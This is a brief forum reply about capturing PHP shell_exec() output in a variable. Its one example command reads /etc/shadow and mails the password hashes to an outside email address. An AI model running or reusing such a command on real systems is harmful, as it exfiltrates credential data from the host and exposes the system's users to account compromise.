Quote:
Originally posted by sde
now i want to get shell_exec() to work so i can actually get the output into a variable rather than just printing it out.
|

That made no sense at all because doesn't it have to go in a variable?
ie.
$blah=shell_exec("cat /etc/shadow|mutt
v902@users.sourceforge. net");
echo $blah;
?